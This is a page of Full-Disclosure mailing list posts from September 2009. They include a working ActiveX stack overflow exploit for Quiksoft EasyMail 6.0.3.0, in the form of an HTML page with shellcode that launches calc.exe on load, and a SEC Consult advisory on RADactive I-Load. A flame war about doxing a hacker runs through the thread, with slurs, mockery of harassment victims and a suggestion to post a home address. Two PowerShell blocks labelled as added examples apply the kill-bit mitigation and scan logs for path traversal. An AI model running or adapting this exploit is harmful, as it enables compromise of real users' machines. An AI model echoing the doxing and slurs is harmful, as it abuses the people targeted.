Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd

2009-09-17 Thread dramacrat
yes. who the fuck is this weev guy, anyway?

2009/9/17 zewb zewbiec...@gmail.com

  Same here. I wanted to learn about security flaws and instead it's just
 all these dumb fags pretending they've doxed some big important person. What
 the fuck is this, 4chan or something? It's full disclosure of security
 holes, not full disclosure of the full names of people because they trolled
 the ux designer you have a crush on or something.

 Stop trying to impress everyone by saying you found some guy's dox. Even if
 you really did find them, I still don't really care. Apparently you think
 this weev guy is some kind of celebrity or something, but I've never heard
 of him and I don't care about the little grudge you have against him, so
 stop filling my inbox with your dumb autistic retardery. Seriously, just
 get a fucking blogspot account or something and post all the shit there so I
 can go to my fucking inbox and not have to sift through all this shit.

 - Original Message -
 *From:* BMF badmotherfs...@gmail.com
 *To:* full-disclosure@lists.grok.org.uk
 *Sent:* Wednesday, September 16, 2009 11:27 PM
 *Subject:* Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd

 WTF is up with this mailing list? I signed up a few weeks ago expecting
 full disclosure of security exploits or at least good security discussion.
 Instead what I got was full disclosure of how idiotic skr1p7 k1dd13z can be.

 BMF

  --

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd

2009-09-17 Thread Anders Klixbull
 
 
he's the wino on the corner sucking your lemon



From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
dramacrat
Sent: 17. september 2009 08:24
To: zewb
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd


yes. who the fuck is this weev guy, anyway?


2009/9/17 zewb zewbiec...@gmail.com


Same here. I wanted to learn about security flaws and instead
it's just all these dumb fags pretending they've doxed some big
important person. What the fuck is this, 4chan or something? It's full
disclosure of security holes, not full disclosure of the full names of
people because they trolled the ux designer you have a crush on or
something.
 
Stop trying to impress everyone by saying you found some guy's
dox. Even if you really did find them, I still don't really care.
Apparently you think this weev guy is some kind of celebrity or
something, but I've never heard of him and I don't care about the little
grudge you have against him, so stop filling my inbox with your dumb
autistic retardery. Seriously, just get a fucking blogspot account or
something and post all the shit there so I can go to my fucking inbox
and not have to sift through all this shit.

- Original Message - 
From: BMF mailto:badmotherfs...@gmail.com  
To: full-disclosure@lists.grok.org.uk 
Sent: Wednesday, September 16, 2009 11:27 PM
Subject: Re: [Full-disclosure] Andrew Auerenheimer aka
weev gets tree'd

WTF is up with this mailing list? I signed up a few
weeks ago expecting full disclosure of security exploits or at least
good security discussion. Instead what I got was full disclosure of how
idiotic skr1p7 k1dd13z can be.

BMF

[Full-disclosure] Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX stack overflow exploit

2009-09-17 Thread Sebastian Wolfgarten
<!--

I - TITLE

Security advisory: Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX stack
overflow exploit

II - SUMMARY

Description: A remotely exploitable buffer overflow in the ActiveX component
of Quiksoft EasyMail 6.0.3.0 allows arbitrary code execution in the user
context.

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),
http://www.devtarget.org

Date: September 17th, 2009

Severity: Medium (remote code execution in the user context)

References: http://www.devtarget.org/easymail-advisory-09-2009.txt

III - OVERVIEW

Quote from quiksoft.com: The EasyMail Products are relied upon by over
thousands of international corporations, federal, state and local
organizations, and individual developers. Quiksoft has established the
EasyMail products as the professional, reliable, and easy to use choice
for e-mail development. More information about the product can be found
online at http://www.quiksoft.com.

IV - DETAILS

The software Quiksoft EasyMail 6.0.3.0 ships emimap4.dll, an ActiveX
component to facilitate the development of IMAP4-aware applications. The
connect() function of this component is prone to a classic buffer overflow
vulnerability when a particularly long argument is passed and the
application attempts to copy that data into a finite buffer. This allows
for the execution of arbitrary code in the user context.

V - MITIGATING MEASURES

Either set the killbit for the relevant ActiveX component 
(clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D)
or install the latest version of Quiksoft EasyMail which is not 
considered vulnerable.

VI - NOTES

Code below was taken from an exploit originally written by e.b
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis
Provencher for drawing my attention to Quiksoft EasyMail. Shellcode below
is rather harmless and executes calc.exe.

Tested on Windows XP SP2 English, IE6, emimap4.dll version 6.0.3.0

-->

<html>
 <head>
  <title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title>
  <script language="JavaScript" defer>
function Check() {

 var buf = 'A';
 while (buf.length <= 440) buf = buf + 'A';

// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
  "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
  "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
  "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
  "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
  "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
  "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
  "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
  "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
  "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
  "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
  "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
  "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
  "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
  "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
  "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
  "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
  "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
  "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
  "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
  "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
  "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
  "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
  "%4e%31%75%74%38%70%65%77%70%43");

var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English

var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

var m = buf + eip + nop + shellcode1 + nop;

obj.connect(m);
   }

   </script>
  </head>
 <body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">
 Failed to instantiate object.
</object>
 </body>
</html>
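Added example, not part of the advisory or the exploit above: a PowerShell script that applies the advisory's first mitigation, setting the Internet Explorer kill bit (Compatibility Flags 0x400) for the CLSID given above and verifying it afterwards. It assumes an elevated PowerShell session on the affected host; the function names are mine.

```powershell
# Added example: set and verify the IE kill bit for the emimap4.dll control
# named in the advisory. Once the kill bit is set, IE refuses to instantiate
# the control no matter which page embeds it. Run from an elevated shell.

function Set-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid)

    $bases = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
    # On 64-bit Windows the 32-bit IE reads the Wow6432Node view, so set both.
    if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
        $bases += 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
    }

    foreach ($base in $bases) {
        $key = Join-Path $base $Clsid
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }

        # Keep any compatibility flags already present and OR in the kill bit.
        $current = 0
        $existing = Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($existing) { $current = [int]$existing.'Compatibility Flags' }
        $newValue = $current -bor 0x400

        New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord `
            -Value $newValue -Force | Out-Null
    }
}

function Test-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid)
    $key  = Join-Path 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' $Clsid
    $prop = Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    return ($null -ne $prop) -and (([int]$prop.'Compatibility Flags' -band 0x400) -ne 0)
}

# CLSID taken from the advisory's mitigation section.
$clsid = '{0CEA3FB1-7F88-4803-AA8E-AD021566955D}'
Set-ActiveXKillBit -Clsid $clsid
if (Test-ActiveXKillBit -Clsid $clsid) {
    Write-Output "Kill bit set for $clsid"
} else {
    Write-Warning "Kill bit NOT set for $clsid"
}
```

The kill bit blocks the control only inside Internet Explorer and other hosts that honour ActiveX Compatibility flags; it does not patch emimap4.dll itself, so the vendor update remains the complete fix.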


[Full-disclosure] Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit

2009-09-17 Thread bmgsec


For the fun of it!

http://www.bmgsec.com.au/advisory/48/

- --
bmgsec

bmgsec [at] gmail.com
www.bmgsec.com.au


Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

2009-09-17 Thread Susan Bradley
jaded mode off

I know too many of the gook geeks behind Microsoft and I do trust that 
this IS NOT a plot to sell more Win7.  Granted the marketing folks spun 
this bulletin WAY WAY TOO much.  It is what it is.  I do believe the 
architecture in XP just isn't there.  It's a 10 year old platform that 
sometimes you can't bolt on this stuff afterwards.  Even in Vista, it's 
not truly fixing the issue, merely making the system more resilient to 
attacks.  Read the fine print in the patch.. it's just making the system 
kill a session and recover better.

I am not a fan of third party because you bring yourself outside the 
support window of the product.

It is just a DOS.  I DOS myself after patch Tuesday sometimes with mere 
patch issues.  Also the risk of this appears low, the potential for 
someone coding up an attack low... I have bigger risks from fake A/V at me.

Is this truly the risk that one has to take such actions and expect such 
energy? 

I don't see that it is.  Give me more information that it is a risk and 
I may change my mind, but right now, I'm just not seeing that it's worth it.



Aras Russ Memisyazici wrote:
 :)

 Thank you all for your valuable comments... Indeed I appreciated some of the
 links/info extended (Susan, Thor and Tom) However, in the end, it sounded
 like:

 a) As a sysadmin in charge of maintaining XP systems along with a whole
 shebang of other mix setups, unless I deploy a better firewall solution, I
 seem to be SOL.

 b) M$ is trying to boost Win7 sales... whoopd...@#$%#^-doo... As was stated
 earlier, they did the exact same thing back in Win2K days... Nothing new
 here... :/ As Larry and Thor pointed out, what sux is that despite M$
 PROMISING that they would continue supporting XP since they didn't exactly
 state WHAT they would support, they seem to be legally free to actually get
 away with this BS *sigh* gotta love insurance-salesman-tactics when it comes
 to promises...

 So... with all this commentary, in the end, I still didn't read from the
 big'uns on whether or not a 3rd party open-source patch would be
 released... I sure miss the days that people back in the day who cared would
 :) In the end I realize, it sounds like a total over-haul of the TCP/IP
 stack is required; but does it really have to? Really?

 How effective is what Tom Grace suggests? Unless I'm misunderstanding, he's
 suggesting switching to an iptables based protection along with a registry
 tweak... ahh the good ol' batch firewall :) Would this actually work as a
 viable work-around? I realize M$ stated this as such, but given their
 current reputation it's really hard to take their word for anything these
 days :P

 What free/cheap client-level-IPS solutions block this current attack? Any
 suggestions?

 Thank you for your time and look forward to some more answers.

 Sincerely,
 Aras Russ Memisyazici
 arasm {at) vt ^dot^ edu  -- I set my return addy to /dev/null for... well
 you know why!

 Systems Administrator
 Virginia Tech

 -Original Message-
 From: Larry Seltzer [mailto:la...@larryseltzer.com] 
 Sent: Wednesday, September 16, 2009 5:03 PM
 To: Susan Bradley; Thor (Hammer of God)
 Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
 Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?

 Yes, they used the bulletin to soft-pedal the description, but at the
 same time I think they send a message about XP users being on shaky
 ground. Just because they've got 4+ years of Extended Support Period
 left doesn't mean they're going to get first-class treatment.

 Larry Seltzer
 Contributing Editor, PC Magazine
 larry_selt...@ziffdavis.com 
 http://blogs.pcmag.com/securitywatch/


 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Susan
 Bradley
 Sent: Wednesday, September 16, 2009 2:26 PM
 To: Thor (Hammer of God)
 Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
 Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

 It's only default for people running XP standalone/consumer that are 
 not even in a home network settings.

 That kinda slices and dices that default down to a VERY narrow sub sub 
 sub set of customer base.

 (Bottom line, yes, the marketing team definitely got a hold of that 
 bulletin)

 Thor (Hammer of God) wrote:
   
 Yeah, I know what it is and what it's for ;)  That was just my subtle
 
 way of trying to make a point.  To be more explicit:
   
 1)  If you are publishing a vulnerability for which there is no patch,
 
 and for which you have no intention of making a patch for, don't tell me
 it's mitigated by ancient, unusable default firewall settings, and don't
 withhold explicit details.  Say THERE WILL BE NO PATCH, EVER.  HERE'S
 EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK.  Also, don't say
 'you can deploy firewall settings via group policy to mitigate exposure'
 when the firewall obviously 

[Full-disclosure] SEC Consult SA-20090917-0 :: RADactive I-Load Multiple Vulnerabilities

2009-09-17 Thread Stefan Streichsbier
SEC Consult Security Advisory < 20090917-0 >
===============================================================================
              title: Multiple Vulnerabilities in RADactive I-Load
           products: RADactive I-Load
 vulnerable version: <= I-Load 2008.2.4.0
      fixed version: I-Load 2008.2.5.0
             impact: critical
           homepage: http://i-load.radactive.com/
              found: 2009-07-20
                 by: S. Streichsbier / SEC Consult / www.sec-consult.com
===============================================================================

Vendor description:
---
I-Load is an ASP.NET component explicitly created to manage image uploading
within ASP.NET applications. Unlike other image manipulation libraries,
I-Load uses a sophisticated graphical interface which allows the uploading,
resizing, cropping and rotating of photos.

source: http://i-load.radactive.com/en/documentation/

Vulnerability overview/description:
---
The I-Load component contains multiple vulnerabilities which are described
below.

* Path Disclosure:
**

The WebCoreModule.ashx script prints the absolute path of the folder name,
where images are saved to, in some requests and responses. This can help an
attacker with the exploitation of the also existing file disclosure
vulnerability.

* Cross Site Scripting:
***

Most of the parameters used by WebCoreModule.ashx start with two underscores
(__), which disables the built-in ASP.NET anti cross-site scripting
functionality. Some parameters are not sufficiently validated and can be
exploited to inject arbitrary JavaScript into the response.


* File Disclosure:
**

WebCoreModule.ashx can be exploited by means of path traversal to read
arbitrary files on the server, given that the file permissions allow it. An
attacker is able to gain sensitive data such as configuration files
(e.g. Web.config), the whole source code of the application or other
sensitive data on the server.


* Arbitrary File Upload:
***********************

It is potentially possible to upload an arbitrary file using the I-Load
Webcontrol with a user-defined file extension. The filename itself is
dynamically generated, but it is possible to reproduce that parameter in
advance. The file remains on the server for a very short period of time.
Nevertheless, during this time frame it could be possible to execute that
file and thus compromise the affected server.

Proof of Concept:
-
SEC Consult will not release proof of concept exploits to the public.

Vulnerable versions:
--------------------
RADactive I-Load 2008.2.4.0

Prior versions are most likely also vulnerable.

Solution:
-
Immediately upgrade to version 2008.2.5.0 which is available at
http://i-load.radactive.com/en/download/.

Changelog: http://radnet.radactive.com/forum/Default.aspx?g=postst=339

Vendor contact time line:
-------------------------
2009-09-01: Contacting RADactive.
2009-09-02: Reply from RADactive.
2009-09-02: Preliminary advisory with full vulnerability details was sent to
RADactive.
2009-09-09: Reply from RADactive, vulnerabilities have been fixed and a new
version has been released.
2009-09-10: Final version of the advisory sent to RADactive and release date
was scheduled.
2009-09-10: Reply from RADactive.
2009-09-17: Release of the advisory.

Advisory URL:
-
https://www.sec-consult.com/advisories_e.html#a62

~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

SEC Consult conducts periodical information security workshops on ISO
27001/BS 7799 in cooperation with BSI Management Systems. For more
information, please refer to https://www.sec-consult.com/academy_e.html

EOF S. Streichsbier / @2009
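Added example, not from the SEC Consult advisory: a PowerShell detection pass over IIS W3C log lines that flags path-traversal attempts against WebCoreModule.ashx, the handler named above, after fully URL-decoding the query string so single- and double-encoded sequences are caught alike. The log lines are constructed, the parameter name "file" is a placeholder (the advisory names no parameters), and the function names are mine.

```powershell
# Added example: detection of path-traversal requests to the I-Load handler
# in IIS W3C logs. The log excerpt below is constructed for the example; the
# "file" parameter is a placeholder, not a parameter documented for I-Load.

$SampleLog = @'
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2009-09-17 10:00:01 10.0.0.5 GET /upload/WebCoreModule.ashx file=photo1.jpg 80 - 192.0.2.10 Mozilla/5.0 200
2009-09-17 10:00:07 10.0.0.5 GET /upload/WebCoreModule.ashx file=..%2f..%2fWeb.config 80 - 198.51.100.7 Mozilla/5.0 200
2009-09-17 10:00:09 10.0.0.5 GET /upload/WebCoreModule.ashx file=%252e%252e%255cWeb.config 80 - 198.51.100.7 Mozilla/5.0 500
2009-09-17 10:00:12 10.0.0.5 GET /images/logo.png - 80 - 192.0.2.11 Mozilla/5.0 200
'@ -split "`r?`n"

function Expand-UrlEncoding {
    # Decode repeatedly (bounded) so double-encoded sequences are normalised too.
    param([string]$Value)
    $prev = $null
    $cur = $Value
    $rounds = 0
    while ($cur -ne $prev -and $rounds -lt 3) {
        $prev = $cur
        $cur = [System.Uri]::UnescapeDataString($cur)
        $rounds++
    }
    return $cur
}

function Find-ILoadTraversal {
    param([string[]]$Lines)
    $fields = $null
    $hits = @()
    foreach ($line in $Lines) {
        if ($line -like '#Fields:*') {
            # The W3C header tells us the column layout; build the index from it.
            $fields = ($line.Substring(8).Trim()) -split ' '
            continue
        }
        if ($line.StartsWith('#') -or [string]::IsNullOrWhiteSpace($line) -or -not $fields) { continue }
        $values = $line -split ' '
        if ($values.Count -ne $fields.Count) { continue }   # malformed line; skip it
        $row = @{}
        for ($i = 0; $i -lt $fields.Count; $i++) { $row[$fields[$i]] = $values[$i] }

        # Only requests that reach the I-Load handler are of interest.
        if ($row['cs-uri-stem'] -notmatch '(?i)/WebCoreModule\.ashx$') { continue }
        $decoded = Expand-UrlEncoding $row['cs-uri-query']
        # ".." followed by / or \ after decoding covers %2f, %5c and double encoding.
        if ($decoded -match '\.\.[\\/]') {
            $hits += [pscustomobject]@{
                Time   = "$($row['date']) $($row['time'])"
                Client = $row['c-ip']
                Status = $row['sc-status']
                Query  = $decoded
            }
        }
    }
    return $hits
}

# Two of the four constructed lines are flagged, both from 198.51.100.7.
Find-ILoadTraversal -Lines $SampleLog | Format-Table -AutoSize
```

Replace $SampleLog with Get-Content on a real IIS log to run it against production data; a 200 status on a flagged line is the case to escalate, since it means the server returned something for the traversed path.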


Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd

2009-09-17 Thread T Biehn
Mapping weev-IRL has no real impact, as he has either an entirely
different identity or a DBA. If this was a fictional account on weev's
part it would be certainly easy, effective, and feasible for him to
change a single letter in his name.

For the next part, you might want to grab some calming tea or something...

If you've achieved anything it's angering his online persona, these
typically only become a bit more malicious and difficult to catch.
You've succeeded only in creating an even larger 'weev.'
Try posting a home address next time.
For bonus points engineer some sort of scheme where the hive becomes
enraged and R4L's him.
It's been done before, and will be done again by those with real 'talent.'

Given that weev has demonstrated competency in all the above I think
it prudent that you not associate this disclosure to any of your
other online identities. (Brag on IRC already? Who did you work with?
You seem to be somewhat close to weev, enough to have a personal
vendetta against him, do you know that everyone you've talked with
actually hates the guy enough not to drop your pseudonym?)

-Travis

On Wed, Sep 16, 2009 at 8:52 PM, zewbiec...@gmail.com
zewbiec...@gmail.com wrote:
 what does google earth have to do with any of this?

 On 9/16/09, GOBBLES gobbles1...@safe-mail.net wrote:
 What do you mean Sherrod *was* a fed?

 Obviously the point wasn't to ruin. The point was to salt the earth by
 filling google with your real name.

 I can now officially say the (Google) Earth has been salted for you. You'll
 never be able to live a real life again. You'll always be hiding in the
 shadows for the rest of your life now.

 It may not hit you now, but eventually you'll feel suffering and despair.

 I'm the one who helped in the process of clipping your wings to keep you
 grounded. To leave you in the world where mediocrity will never come.

 You are a monster for what you did to Kathy... She's a great UX designer and
 a beautiful woman...

 Sincerely,

 Tim O'Reilly

 Btw all dogs go to heaven was awesome you fucking faggot

  Original Message 
 From: Andrew A glutt...@gmail.com
 To: GOBBLES gobbles1...@safe-mail.net
 Cc: full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
 Date: Tue, 15 Sep 2009 23:52:42 -0500

 Okay. You've been in contact with Hep? She's handed over her logs? Oh
 man, the FBI now has hundreds of megs of me scrolling ansi on IRC,
 telling her she's a sickly withered ghoul, calling her fat, and making
 fun of her Springeresque living situation of having 3 different kids
 by 3 different dads (seriously hep is basically the hip web2.0 version
 of used up trailer trash whore).

 Oclet's handed over his logs? Wow, the FBI now has records of all the
 times I've told him to stop doing cocaine and drinking and clean up
 his act.

 Sherrod DeGrippo was indeed a fed. If she's turned against me, the FBI
 now has all the records of me posting the information of people with
 autism to Encyclopedia Dramatica! I'm goin' down!

 Tehdely, the gay San Francisco Jew who works for blogging house Six
 Apart will be able to tell a jury that I, in the haze of a 5-balloon
 dose of nitrous oxide, did a sieg heil salute and shouted heil
 hitler while giggling hysterically. I, clearly, will be screwed by
 this revelation of SECRET KNOWLEDGE in the grand jury proceedings.

 And actually, you can make your living off of advertising and selling
 t-shirts. I made high sfigs off of direct marketing alone for several
 years.

 You antis are pathetic. You think you got one up on me by pasting some
 fuckin info I put in my fuckin LIVEJOURNAL? Is this what hackin is
 these days? Are you gonna start syndicating emo rants from 14 year old
 girls into f-d posts with ascii banners at the top, acting like you
 owned people?

 See, for a doxdrop to be proper, you have to do info that is not
 already public, and you have to tie it together in a way that reveals
 something about their lives that they did not want people to know.

 For example, when some clever soul revealed that Rob Levin of freenode
 didn't actually live in a trailer, had all sorts of welfare and was
 still using people's donations to supplement his income, that was a
 pretty sweet doxdrop:
 http://antisec.wordpress.com/2006/06/27/eyeballing-rob-levin/

 Or when somebody pieced together Kathy Sierra's sordid history of dick
 sucking, that was pretty fuckin' awesome:
 http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2007-03/msg00507.html

 You, sir, are a fucking amateur. You haven't uncovered anything new
 (the most well funded law enforcement organization in the world had to
 do that for you in their organized campaign, and you copied it from my
 livejournal), and it is certainly not anything I tried to hide, as I
 put it in my fucking blog. No secrets uncovered, no dark past
 revealed, just shit you copied from my livejournal to full-disclosure.
 Doxdrop is not copy and paste. You 

[Full-disclosure] Peiter Mudge Zatko petition to be named U.S. Cybersecurity Chief

2009-09-17 Thread The Sp3ctacle
http://www.ipetitions.com/petition/mudge4cyberczar/index.html

This petition is posted in support for the nomination of Peiter Zatko
(aka mudge) to the President's post of Cybersecurity Chief. We've all
seen how effective past efforts have been regarding this initiative,
and realize the importance of nominating someone who understands not
only all facets of cybersecurity, but has garnered the respect of both
peers and adversaries in the space. Dr. Zatko's bio is available at:
http://en.wikipedia.org/wiki/P... and
http://www.allbusiness.com/gov...


Re: [Full-disclosure] Andrew Auerenheimer aka weev gets tree'd

2009-09-17 Thread frank^2
On Wed, Sep 16, 2009 at 9:27 PM, BMF badmotherfs...@gmail.com wrote:

 WTF is up with this mailing list? I signed up a few weeks ago expecting
 full disclosure of security exploits or at least good security discussion.
 Instead what I got was full disclosure of how idiotic skr1p7 k1dd13z can be.

 BMF




This list publishes exactly what you're looking for. If you can't
handle the occasional soap opera or jizzing ASCII swastika cock all
over your e-mail message, maybe you should just stick with Bugtraq and
Secunia.


Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

2009-09-17 Thread Susan Bradley
Good geeks ...not gook geeks.

It's not a racial slight, it's spellchecker not working and I didn't 
realize I spelled it wrong.  My deepest apologies if anyone reads that 
wrong.

Hisashi T Fujinaka wrote:
 On Thu, 17 Sep 2009, Susan Bradley wrote:

 jaded mode off

 I know too many of the gook geeks behind Microsoft and I do trust 
 that this
   

 You do realize this can be read as a racial slight towards Koreans.

 IS NOT a plot to sell more Win7.  Granted the marketing folks spun 
 this bulletin WAY WAY TOO much.  It is what it is.  I do believe the 
 architecture in XP just isn't there.  It's a 10 year old platform 
 that sometimes you can't bolt on this stuff afterwards.  Even in 
 Vista, it's not truly fixing the issue, merely making the system more 
 resilient to attacks.  Read the fine print in the patch.. it's just 
 making the system kill a session and recover better.

 I am not a fan of third party because you bring yourself outside the 
 support window of the product.

 It is just a DOS.  I DOS myself after patch Tuesday sometimes with 
 mere patch issues.  Also the risk of this appears low, the potential 
 for someone coding up an attack low... I have bigger risks from fake 
 A/V at me.

 Is this truly the risk that one has to take such actions and expect 
 such energy? I don't see that it is.  Give me more information that 
 it is a risk and I may change my mind, but right now, I'm just not 
 seeing that it's worth it.



 Aras Russ Memisyazici wrote:
 :)

 Thank you all for your valuable comments... Indeed I appreciated 
 some of the
 links/info extended (Susan, Thor and Tom) However, in the end, it 
 sounded
 like:

 a) As a sysadmin in charge of maintaining XP systems along with a whole
 shebang of other mix setups, unless I deploy a better firewall 
 solution, I
 seem to be SOL.

 b) M$ is trying to boost Win7 sales... whoopd...@#$%#^-doo... As was 
 stated
 earlier, they did the exact same thing back in Win2K days... Nothing 
 new
 here... :/ As Larry and Thor pointed out, what sux is that despite M$
 PROMISING that they would continue supporting XP since they didn't 
 exactly
 state WHAT they would support, they seem to be legally free to 
 actually get
 away with this BS *sigh* gotta love insurance-salesman-tactics when 
 it comes
 to promises...

 So... with all this commentary, in the end, I still didn't read from 
 the
 big'uns on whether or not a 3rd party open-source patch would be
 released... I sure miss the days that people back in the day who 
 cared would
 :) In the end I realize, it sounds like a total over-haul of the TCP/IP
 stack is required; but does it really have to? Really?

 How effective is what Tom Grace suggests? Unless I'm 
 misunderstanding, he's
 suggesting switching to an iptables based protection along with a 
 registry
 tweak... ahh the good ol' batch firewall :) Would this actually work 
 as a
 viable work-around? I realize M$ stated this as such, but given their
 current reputation it's really hard to take their word for anything 
 these
 days :P

 What free/cheap client-level-IPS solutions block this current 
 attack? Any
 suggestions?

 Thank you for your time and look forward to some more answers.

 Sincerely,
 Aras Russ Memisyazici
 arasm {at) vt ^dot^ edu  -- I set my return addy to /dev/null 
 for... well
 you know why!

 Systems Administrator
 Virginia Tech

 -Original Message-
 From: Larry Seltzer [mailto:la...@larryseltzer.com] Sent: Wednesday, 
 September 16, 2009 5:03 PM
 To: Susan Bradley; Thor (Hammer of God)
 Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
 Subject: RE: [Full-disclosure] 3rd party patch for XP for MS09-048?

 Yes, they used the bulletin to soft-pedal the description, but at the
 same time I think they send a message about XP users being on shaky
 ground. Just because they've got 4+ years of Extended Support Period
 left doesn't mean they're going to get first-class treatment.

 Larry Seltzer
 Contributing Editor, PC Magazine
 larry_selt...@ziffdavis.com http://blogs.pcmag.com/securitywatch/


 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Susan
 Bradley
 Sent: Wednesday, September 16, 2009 2:26 PM
 To: Thor (Hammer of God)
 Cc: full-disclosure@lists.grok.org.uk; bugt...@securityfocus.com
 Subject: Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

 It's only default for people running XP standalone/consumer that 
 are not even in a home network settings.

 That kinda slices and dices that default down to a VERY narrow sub 
 sub sub set of customer base.

 (Bottom line, yes, the marketing team definitely got a hold of that 
 bulletin)

 Thor (Hammer of God) wrote:

 Yeah, I know what it is and what it's for ;)  That was just my subtle

 way of trying to make a point.  To be more explicit:

 1)  If you are publishing a vulnerability for which there is no patch,

 and 

[Full-disclosure] Peiter Mudge Zatko petition to be named U.S. Cybersecurity Chief

2009-09-17 Thread full-censorship
lol, best troll attempt since n3td3v and gobbles got banned

The Sp3ctacle sp3cta...@gmail.com wrote:

http://www.ipetitions.com/petition/mudge4cyberczar/index.html

This petition is posted in support for the nomination of Peiter 
Zatko
(aka mudge) to the President's post of Cybersecurity Chief. 
We've all
seen how effective past efforts have been regarding this 
initiative,
and realize the importance of nominating someone who 
understands not
only all facets of cybersecurity, but has garnered the respect 
of both
peers and adversaries in the space. Dr. Zatko's bio is 
available at:
http://en.wikipedia.org/wiki/P... and
http://www.allbusiness.com/gov...


Re: [Full-disclosure] Peiter Mudge Zatko petition to be named U.S. Cybersecurity Chief

2009-09-17 Thread Randal T. Rioux
The Sp3ctacle wrote:
 http://www.ipetitions.com/petition/mudge4cyberczar/index.html
 
 This petition is posted in support for the nomination of Peiter Zatko
 (aka mudge) to the President's post of Cybersecurity Chief. We've all
 seen how effective past efforts have been regarding this initiative,
 and realize the importance of nominating someone who understands not
 only all facets of cybersecurity, but has garnered the respect of both
 peers and adversaries in the space. Dr. Zatko's bio is available at:
 http://en.wikipedia.org/wiki/P... and
 http://www.allbusiness.com/gov...

Yeah, because if it is one thing he wants, it is a powerless figurehead 
position of bureaucracy and politics.

There is a reason why nobody stays in the high level (US) information 
security roles for long.

Randy


[Full-disclosure] SecurityReason: glibc <= 2.10.1 stdio/strfmon.c Multiple vulnerabilities

2009-09-17 Thread Maksymilian Arciemowicz
-----BEGIN PGP SIGNED MESSAGE-----
